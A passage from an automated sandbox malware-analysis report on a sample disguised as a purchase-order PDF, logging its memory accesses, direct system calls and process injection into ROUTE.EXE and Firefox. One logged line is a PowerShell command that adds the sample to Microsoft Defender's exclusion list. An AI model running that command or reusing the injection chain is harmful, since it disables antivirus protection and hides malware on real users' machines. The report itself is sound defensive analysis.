                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BA470 mov eax, dword ptr fs:[00000030h]5_2_016BA470
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016BA470 mov eax, dword ptr fs:[00000030h]5_2_016BA470
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CE443 mov eax, dword ptr fs:[00000030h]5_2_016CE443
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B245A mov eax, dword ptr fs:[00000030h]5_2_016B245A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168645D mov eax, dword ptr fs:[00000030h]5_2_0168645D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168E420 mov eax, dword ptr fs:[00000030h]5_2_0168E420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168E420 mov eax, dword ptr fs:[00000030h]5_2_0168E420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168E420 mov eax, dword ptr fs:[00000030h]5_2_0168E420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168C427 mov eax, dword ptr fs:[00000030h]5_2_0168C427
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01716420 mov eax, dword ptr fs:[00000030h]5_2_01716420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01716420 mov eax, dword ptr fs:[00000030h]5_2_01716420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01716420 mov eax, dword ptr fs:[00000030h]5_2_01716420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01716420 mov eax, dword ptr fs:[00000030h]5_2_01716420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01716420 mov eax, dword ptr fs:[00000030h]5_2_01716420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01716420 mov eax, dword ptr fs:[00000030h]5_2_01716420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01716420 mov eax, dword ptr fs:[00000030h]5_2_01716420
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA430 mov eax, dword ptr fs:[00000030h]5_2_016CA430
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C8402 mov eax, dword ptr fs:[00000030h]5_2_016C8402
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C8402 mov eax, dword ptr fs:[00000030h]5_2_016C8402
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C8402 mov eax, dword ptr fs:[00000030h]5_2_016C8402
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016904E5 mov ecx, dword ptr fs:[00000030h]5_2_016904E5
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171A4B0 mov eax, dword ptr fs:[00000030h]5_2_0171A4B0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016964AB mov eax, dword ptr fs:[00000030h]5_2_016964AB
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C44B0 mov ecx, dword ptr fs:[00000030h]5_2_016C44B0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01698770 mov eax, dword ptr fs:[00000030h]5_2_01698770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A0770 mov eax, dword ptr fs:[00000030h]5_2_016A0770
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C674D mov esi, dword ptr fs:[00000030h]5_2_016C674D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C674D mov eax, dword ptr fs:[00000030h]5_2_016C674D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C674D mov eax, dword ptr fs:[00000030h]5_2_016C674D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01714755 mov eax, dword ptr fs:[00000030h]5_2_01714755
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171E75D mov eax, dword ptr fs:[00000030h]5_2_0171E75D
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01690750 mov eax, dword ptr fs:[00000030h]5_2_01690750
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2750 mov eax, dword ptr fs:[00000030h]5_2_016D2750
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2750 mov eax, dword ptr fs:[00000030h]5_2_016D2750
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170C730 mov eax, dword ptr fs:[00000030h]5_2_0170C730
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CC720 mov eax, dword ptr fs:[00000030h]5_2_016CC720
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CC720 mov eax, dword ptr fs:[00000030h]5_2_016CC720
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C273C mov eax, dword ptr fs:[00000030h]5_2_016C273C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C273C mov ecx, dword ptr fs:[00000030h]5_2_016C273C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C273C mov eax, dword ptr fs:[00000030h]5_2_016C273C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CC700 mov eax, dword ptr fs:[00000030h]5_2_016CC700
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01690710 mov eax, dword ptr fs:[00000030h]5_2_01690710
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C0710 mov eax, dword ptr fs:[00000030h]5_2_016C0710
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B27ED mov eax, dword ptr fs:[00000030h]5_2_016B27ED
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B27ED mov eax, dword ptr fs:[00000030h]5_2_016B27ED
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B27ED mov eax, dword ptr fs:[00000030h]5_2_016B27ED
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171E7E1 mov eax, dword ptr fs:[00000030h]5_2_0171E7E1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016947FB mov eax, dword ptr fs:[00000030h]5_2_016947FB
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016947FB mov eax, dword ptr fs:[00000030h]5_2_016947FB
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169C7C0 mov eax, dword ptr fs:[00000030h]5_2_0169C7C0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017107C3 mov eax, dword ptr fs:[00000030h]5_2_017107C3
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016907AF mov eax, dword ptr fs:[00000030h]5_2_016907AF
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0173678E mov eax, dword ptr fs:[00000030h]5_2_0173678E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA660 mov eax, dword ptr fs:[00000030h]5_2_016CA660
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA660 mov eax, dword ptr fs:[00000030h]5_2_016CA660
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C2674 mov eax, dword ptr fs:[00000030h]5_2_016C2674
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175866E mov eax, dword ptr fs:[00000030h]5_2_0175866E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0175866E mov eax, dword ptr fs:[00000030h]5_2_0175866E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AC640 mov eax, dword ptr fs:[00000030h]5_2_016AC640
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0169262C mov eax, dword ptr fs:[00000030h]5_2_0169262C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C6620 mov eax, dword ptr fs:[00000030h]5_2_016C6620
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C8620 mov eax, dword ptr fs:[00000030h]5_2_016C8620
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016AE627 mov eax, dword ptr fs:[00000030h]5_2_016AE627
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A260B mov eax, dword ptr fs:[00000030h]5_2_016A260B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A260B mov eax, dword ptr fs:[00000030h]5_2_016A260B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A260B mov eax, dword ptr fs:[00000030h]5_2_016A260B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A260B mov eax, dword ptr fs:[00000030h]5_2_016A260B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A260B mov eax, dword ptr fs:[00000030h]5_2_016A260B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A260B mov eax, dword ptr fs:[00000030h]5_2_016A260B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016A260B mov eax, dword ptr fs:[00000030h]5_2_016A260B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D2619 mov eax, dword ptr fs:[00000030h]5_2_016D2619
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E609 mov eax, dword ptr fs:[00000030h]5_2_0170E609
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017106F1 mov eax, dword ptr fs:[00000030h]5_2_017106F1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017106F1 mov eax, dword ptr fs:[00000030h]5_2_017106F1
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E6F2 mov eax, dword ptr fs:[00000030h]5_2_0170E6F2
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E6F2 mov eax, dword ptr fs:[00000030h]5_2_0170E6F2
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E6F2 mov eax, dword ptr fs:[00000030h]5_2_0170E6F2
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E6F2 mov eax, dword ptr fs:[00000030h]5_2_0170E6F2
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA6C7 mov ebx, dword ptr fs:[00000030h]5_2_016CA6C7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CA6C7 mov eax, dword ptr fs:[00000030h]5_2_016CA6C7
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016CC6A6 mov eax, dword ptr fs:[00000030h]5_2_016CC6A6
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C66B0 mov eax, dword ptr fs:[00000030h]5_2_016C66B0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01694690 mov eax, dword ptr fs:[00000030h]5_2_01694690
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01694690 mov eax, dword ptr fs:[00000030h]5_2_01694690
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D096E mov eax, dword ptr fs:[00000030h]5_2_016D096E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D096E mov edx, dword ptr fs:[00000030h]5_2_016D096E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D096E mov eax, dword ptr fs:[00000030h]5_2_016D096E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B6962 mov eax, dword ptr fs:[00000030h]5_2_016B6962
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B6962 mov eax, dword ptr fs:[00000030h]5_2_016B6962
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016B6962 mov eax, dword ptr fs:[00000030h]5_2_016B6962
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01734978 mov eax, dword ptr fs:[00000030h]5_2_01734978
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01734978 mov eax, dword ptr fs:[00000030h]5_2_01734978
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171C97C mov eax, dword ptr fs:[00000030h]5_2_0171C97C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01710946 mov eax, dword ptr fs:[00000030h]5_2_01710946
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0172892B mov eax, dword ptr fs:[00000030h]5_2_0172892B
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171892A mov eax, dword ptr fs:[00000030h]5_2_0171892A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0171C912 mov eax, dword ptr fs:[00000030h]5_2_0171C912
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01688918 mov eax, dword ptr fs:[00000030h]5_2_01688918
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe"
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtOpenSection: Direct from: 0x76EF2E0C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtCreateFile: Direct from: 0x76EF2FEC
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtOpenFile: Direct from: 0x76EF2DCC
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtTerminateThread: Direct from: 0x76EF2FCC
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtCreateMutant: Direct from: 0x76EF35CC
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtResumeThread: Direct from: 0x76EF36AC
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtReadFile: Direct from: 0x76EF2ADC
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtDelayExecution: Direct from: 0x76EF2DDC
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtResumeThread: Direct from: 0x76EF2FBC
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtCreateUserProcess: Direct from: 0x76EF371C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtSetInformationThread: Direct from: 0x76EE63F9
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtClose: Direct from: 0x76EF2B6C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtSetInformationThread: Direct from: 0x76EF2B4C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe NtCreateKey: Direct from: 0x76EF2C6C
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Memory written: C:\Users\user\Desktop\PO 2025918 pdf.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Section loaded: NULL target: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Section loaded: NULL target: C:\Windows\SysWOW64\ROUTE.EXE protection: execute and read and write
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe protection: read write
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Users\user\Desktop\PO 2025918 pdf.exe protection: read write
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Users\user\Desktop\PO 2025918 pdf.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Thread register set: target process: 6468
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Thread APC queued: target process: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe Process created: C:\Users\user\Desktop\PO 2025918 pdf.exe "C:\Users\user\Desktop\PO 2025918 pdf.exe"
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
                      Source: C:\Windows\SysWOW64\ROUTE.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: mIrIhAjAJblou.exe, 00000007.00000000.2375733559.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896277747.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000000.2526808133.00000000019C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
                      Source: mIrIhAjAJblou.exe, 00000007.00000000.2375733559.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896277747.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000000.2526808133.00000000019C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: mIrIhAjAJblou.exe, 00000007.00000000.2375733559.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896277747.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000000.2526808133.00000000019C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                      Source: mIrIhAjAJblou.exe, 00000007.00000000.2375733559.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896277747.0000000001711000.00000002.00000001.00040000.00000000.sdmp, mIrIhAjAJblou.exe, 0000000A.00000000.2526808133.00000000019C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\PO 2025918 pdf.exe | Queries volume information: C:\Users\user\Desktop\PO 2025918 pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\PO 2025918 pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PO 2025918 pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PO 2025918 pdf.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
